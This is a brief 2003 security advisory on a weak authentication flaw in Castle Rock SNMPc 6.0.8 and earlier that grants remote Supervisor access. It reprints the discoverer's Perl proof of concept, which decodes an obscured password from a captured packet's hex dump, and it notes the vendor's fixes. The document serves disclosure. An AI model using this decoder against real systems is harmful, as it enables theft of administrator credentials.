Weak Authentication in SNMPc

Reported August 27, 2003 by Alexander V. Nickolenko.

 

 

VERSIONS AFFECTED

 

Castle Rock SNMPc 6.0.8 and earlier

 

DESCRIPTION

 

A vulnerability in Castle Rock SNMPc 6.0.8 and earlier can let any remote user gain Supervisor access to the vulnerable system. This vulnerability is a result of a weak authentication protocol.
 

DEMONSTRATION

 

The discoverer posted the following code as proof of concept:

 

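#!/usr/bin/perl

# Lookup table indexed by byte value; used below to translate pairs of hex bytes.
$str='.YZ[\\]^_PQRSTUVWHIJKLMNO@ABCDEFGxyz{|}~.pqrstuvwhijklmno`abcdefg................................89:;<=>?01234567()*+,-./ !"#$%&\'................................................................................................................................';

# Read a hex dump on standard input; collection starts at the line with offset 0130.
while(<>)
{
   $s="";
   if(/^0130 /){
     GETIT: {
       do {
         s/^0130 00 00 // if /^0130/;
         s/^[[:xdigit:]]{4} //;
         s/ .*$//ms;
         $s=$s." ".$_;
         # Stop collecting once a 00 byte has been seen.
         last GETIT if ($s =~ / 00/);
       } while (<>)
     };
     $s=~s/ 00.*$//ms;
     # Translate each pair of hex bytes through the table.
     $s=~s/ ([[:xdigit:]]{2}) ([[:xdigit:]]{2})/ substr($str,(hex($1)),1).substr($str,(hex($2)),1) /ige;
     # Convert any remaining hex byte to its literal character.
     $s=~s/ ([[:xdigit:]]{2})/ chr(hex($1)) /ige;
     print ":$s:\n";
   }
}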

 

VENDOR RESPONSE

 

Castle Rock has released fixes for versions 6.0.5 and 6.0.8 and a full version fix for release 5.1.

 

CREDIT

Discovered by Alexander V. Nickolenko.
